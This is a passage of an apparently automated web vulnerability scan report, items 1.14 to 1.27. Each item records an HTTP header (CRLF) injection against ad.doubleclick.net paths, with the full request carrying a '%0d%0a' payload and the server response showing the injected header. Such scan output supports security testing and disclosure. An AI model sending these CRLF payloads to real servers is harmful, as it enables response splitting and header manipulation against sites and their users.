Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8504a
df688c05841/N5367.3630.247REALMEDIAINC.1/B4475978.2;sz=728x90;click0=http: //network.realmedia.com/RealMedia/ads/click_lx.ads/drudgereport/728x90/ron/nws/ss/a/L32/669427212/Top1/USNetwork/BCN2010050590_016_SafeAuto/SafeAuto_RTG_728_Correct.html/726348573830307044726341416f7670
Date: Mon, 14 Feb 2011 02:47:01 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.14. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/markets_intelligentinvestor

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 18c9f%0d%0a0be64f77a4b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /18c9f%0d%0a0be64f77a4b/interactive.wsj.com/markets_intelligentinvestor;u=;!category=;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=1;sz=377x50;ord=8027802780278027; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/18c9f
0be64f77a4b/interactive.wsj.com/markets_intelligentinvestor;u=;!category=;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=1;sz=377x50;ord=8027802780278027;:
Date: Mon, 14 Feb 2011 01:36:58 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.15. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 676f7%0d%0a0fa438a5db8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /676f7%0d%0a0fa438a5db8/interactive.wsj.com/personalfinance_newsreel;u=;!category=;;mc=b2pfreezone;tile=1;sz=2x94;ord=3623362336233623; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/676f7
0fa438a5db8/interactive.wsj.com/personalfinance_newsreel;u=;!category=;;mc=b2pfreezone;tile=1;sz=2x94;ord=3623362336233623;:
Date: Mon, 14 Feb 2011 01:37:05 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.16. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.11 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3340.trfu/B4677841.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8da73%0d%0ae56ac07066f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8da73%0d%0ae56ac07066f/N3340.trfu/B4677841.11;sz=160x600;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aMmMBkod6OXq2x2HUHQcrF563KmtIoVWbdYFrk1Fji0qqnSUnAUbYYTt3UnUjmPUrqYqrp4EJg5af4oTrH1rffUHfVoAnBnGYvpWfE5TQ73dem3A7KnF3ZdXsfRYVJ31V7Nmq745FYRVrBZbVmnYQEvQSbQGyl1SGq/;ord=1074505797? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8da73
e56ac07066f/N3340.trfu/B4677841.11;sz=160x600;pc=[TPAS_ID];click=http: //a.tribalfusion.com/h.click/aMmMBkod6OXq2x2HUHQcrF563KmtIoVWbdYFrk1Fji0qqnSUnAUbYYTt3UnUjmPUrqYqrp4EJg5af4oTrH1rffUHfVoAnBnGYvpWfE5TQ73dem3A7KnF3ZdXsfRYVJ31V7Nmq745FYRVrBZbVmnYQEvQSbQGyl1SGq/;ord=1074505797
Date: Mon, 14 Feb 2011 02:10:44 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.17. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.16 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3340.trfu/B4677841.16

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 353a8%0d%0a75a8fe84543 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /353a8%0d%0a75a8fe84543/N3340.trfu/B4677841.16;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aDmMBkUArTPEQYQGMsQWUy0djrTmQM4srYYrQDV6Xr4AZbaQPFH2dUrXWUCmH6v56BS5GbeTcn9Wc7gPPZbMWdv3Urf45b6uWqUwWEJ8SE3FSGJZaRr6rRtYdWcbW4rimntimYTmp4tvBQsFZd5AYKpdEyVTZbPyhCana/;ord=1099355303? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/353a8
75a8fe84543/N3340.trfu/B4677841.16;sz=728x90;pc=[TPAS_ID];click=http: //a.tribalfusion.com/h.click/aDmMBkUArTPEQYQGMsQWUy0djrTmQM4srYYrQDV6Xr4AZbaQPFH2dUrXWUCmH6v56BS5GbeTcn9Wc7gPPZbMWdv3Urf45b6uWqUwWEJ8SE3FSGJZaRr6rRtYdWcbW4rimntimYTmp4tvBQsFZd5AYKpdEyVTZbPyhCana/;ord=1099355303
Date: Mon, 14 Feb 2011 02:49:58 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.18. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.2 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3340.trfu/B4677841.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7a3a9%0d%0ae709d62e175 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7a3a9%0d%0ae709d62e175/N3340.trfu/B4677841.2;sz=160x600;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aHmMBkRU7NYEnq5qbi4E71nEfF1bFdWHJTn6rBpVUroWfF2qri3Heq3AjEmUYZdXGfPYVJT1sBopEn35UZbSTFZbZcWAr0RErQQcrNPdUuYdbuVmMM4sYYXbrITAio46B9QmbF3tUOXH3ZcnWin4PQT4sngVbUVtZbrHGd/;ord=1089458998? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7a3a9
e709d62e175/N3340.trfu/B4677841.2;sz=160x600;pc=[TPAS_ID];click=http: //a.tribalfusion.com/h.click/aHmMBkRU7NYEnq5qbi4E71nEfF1bFdWHJTn6rBpVUroWfF2qri3Heq3AjEmUYZdXGfPYVJT1sBopEn35UZbSTFZbZcWAr0RErQQcrNPdUuYdbuVmMM4sYYXbrITAio46B9QmbF3tUOXH3ZcnWin4PQT4sngVbUVtZbrHGd/;ord=1089458998
Date: Mon, 14 Feb 2011 02:34:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.19. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.38 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3340.trfu/B4677841.38

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 41285%0d%0a1e6e4985043 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /41285%0d%0a1e6e4985043/N3340.trfu/B4677841.38;sz=160x600;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aGmMBkREnQQcvrQWbM1WvnWmnN4cQ10UvZdUPmw2AvdPmMG3dro0dYKpdIm4AMR5sj6TVBbVVjkR6YvWdZbRWrBP3bIsUqQvVTniPEBIQGZbCPb6tPHv6Wc3T4r6pmWuqYamy3HMZdSVfC4AvEpWInUWZbh0crUOW2jJt/;ord=1093437000? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/41285
1e6e4985043/N3340.trfu/B4677841.38;sz=160x600;pc=[TPAS_ID];click=http: //a.tribalfusion.com/h.click/aGmMBkREnQQcvrQWbM1WvnWmnN4cQ10UvZdUPmw2AvdPmMG3dro0dYKpdIm4AMR5sj6TVBbVVjkR6YvWdZbRWrBP3bIsUqQvVTniPEBIQGZbCPb6tPHv6Wc3T4r6pmWuqYamy3HMZdSVfC4AvEpWInUWZbh0crUOW2jJt/;ord=1093437000
Date: Mon, 14 Feb 2011 02:40:56 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.20. http://ad.doubleclick.net/adj/N4233.RSI/B4932906.5 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4233.RSI/B4932906.5

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2b8f1%0d%0a4fde4d2ea46 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2b8f1%0d%0a4fde4d2ea46/N4233.RSI/B4932906.5;sz=728x90;pc=[TPAS_ID];click0=http://ad.yieldmanager.com/clk?2,13%3B347c1d6bae030f8b%3B12e21cf7f71,0%3B%3B%3B2909974716,tgEAALdCCQAMv2oAAAAAACJcHgAAAAAAAgAAAAYAAAAAAP8AAAABFJxwDgAAAAAAUgYoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAopAQAAAAAAAIAAgAAAAAAZH.PIS4BAAAAAAAAAGNjZTE4Yzc2LTM3ZGEtMTFlMC05MDYyLTAwMzA0OGQ0NDg0MABwAAAAAAA=,,http%3A%2F%2Fblogs.desmoinesregister.com%2Fdmr%2Findex.php%2F2011%2F02%2F11%2Fdaniels-at-cpac-calls-for-broad-civil-conservative-coalition%2F,;ord=1297647370? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2b8f1
4fde4d2ea46/N4233.RSI/B4932906.5;sz=728x90;pc=[TPAS_ID];click0=http: //ad.yieldmanager.com/clk
Date: Mon, 14 Feb 2011 01:38:16 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.21. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4dc34%0d%0aa5e50b6234 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4dc34%0d%0aa5e50b6234/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4dc34
a5e50b6234/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http: //media.fastclick.net/w/click.here
Date: Mon, 14 Feb 2011 01:44:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.22. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.19 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5506.aol1/B5070033.19

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 21598%0d%0adfea6d161cc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /21598%0d%0adfea6d161cc/N5506.aol1/B5070033.19;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000790494/mnum=0000961998/cstr=21356372=_4d5883e9,4634560753,790494%5E961998%5E65%5E0,1_/xsxdata=$xsxdata/bnum=21356372/optn=64?trg=;ord=4634560753? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/21598
dfea6d161cc/N5506.aol1/B5070033.19;sz=300x250;click=http: //r1-ads.ace.advertising.com/click/site=0000790494/mnum=0000961998/cstr=21356372=_4d5883e9,4634560753,790494^961998^65^0,1_/xsxdata=$xsxdata/bnum=21356372/optn=64
Date: Mon, 14 Feb 2011 01:26:53 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.23. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.20 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5506.aol1/B5070033.20

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6f51e%0d%0a50897e369b1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6f51e%0d%0a50897e369b1/N5506.aol1/B5070033.20;sz=468x60;click=http://r1-ads.ace.advertising.com/click/site=0000784416/mnum=0000955496/cstr=16922248=_4d5886f4,5663037085,784416%5E955496%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=16922248/optn=64?trg=;ord=5663037085? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6f51e
50897e369b1/N5506.aol1/B5070033.20;sz=468x60;click=http: //r1-ads.ace.advertising.com/click/site=0000784416/mnum=0000955496/cstr=16922248=_4d5886f4,5663037085,784416^955496^1183^0,1_/xsxdata=$xsxdata/bnum=16922248/optn=64
Date: Mon, 14 Feb 2011 01:37:19 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.24. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.21 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5506.aol1/B5070033.21

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4200e%0d%0a6f9caf0b583 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4200e%0d%0a6f9caf0b583/N5506.aol1/B5070033.21;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000790492/mnum=0000955494/cstr=2727762=_4d588747,6836118676,790492%5E955494%5E65%5E0,1_/xsxdata=$xsxdata/bnum=2727762/optn=64?trg=;ord=6836118676? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4200e
6f9caf0b583/N5506.aol1/B5070033.21;sz=160x600;click=http: //r1-ads.ace.advertising.com/click/site=0000790492/mnum=0000955494/cstr=2727762=_4d588747,6836118676,790492^955494^65^0,1_/xsxdata=$xsxdata/bnum=2727762/optn=64
Date: Mon, 14 Feb 2011 01:40:28 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.25. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B3792881.193 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5798.133090.8212946998421/B3792881.193

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3d0ee%0d%0a9315563214f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3d0ee%0d%0a9315563214f/N5798.133090.8212946998421/B3792881.193;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=60387657634239681&mt_id=102306&mt_adid=53&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60387657634239681? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3d0ee
9315563214f/N5798.133090.8212946998421/B3792881.193;sz=300x250;click1=http: //pixel.mathtag.com/click/img
Date: Mon, 14 Feb 2011 02:14:33 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.26. http://ad.doubleclick.net/adj/N6046.134363.2043285697521/B5118749.2 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N6046.134363.2043285697521/B5118749.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 69142%0d%0a1bb7359b8ec was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /69142%0d%0a1bb7359b8ec/N6046.134363.2043285697521/B5118749.2;sz=180x150;click=http://r1-ads.ace.advertising.com/click/site=0000786606/mnum=0000947584/cstr=80089922=_4d588ace,5635760168,786606%5E947584%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=80089922/optn=64?trg=;ord=5635760168? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/69142
1bb7359b8ec/N6046.134363.2043285697521/B5118749.2;sz=180x150;click=http: //r1-ads.ace.advertising.com/click/site=0000786606/mnum=0000947584/cstr=80089922=_4d588ace,5635760168,786606^947584^1183^0,1_/xsxdata=$xsxdata/bnum=80089922/optn=64
Date: Mon, 14 Feb 2011 01:52:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.27. http://ad.doubleclick.net/adj/N6092.AOL/B5108587.3 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N6092.AOL/B5108587.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9b799%0d%0abb53a367fe4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9b799%0d%0abb53a367fe4/N6092.AOL/B5108587.3;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000717505/mnum=0000969227/cstr=23267000=_4d588750,4637776738,717505%5E969227%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=23267000/optn=64?trg=;ord=4637776738? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
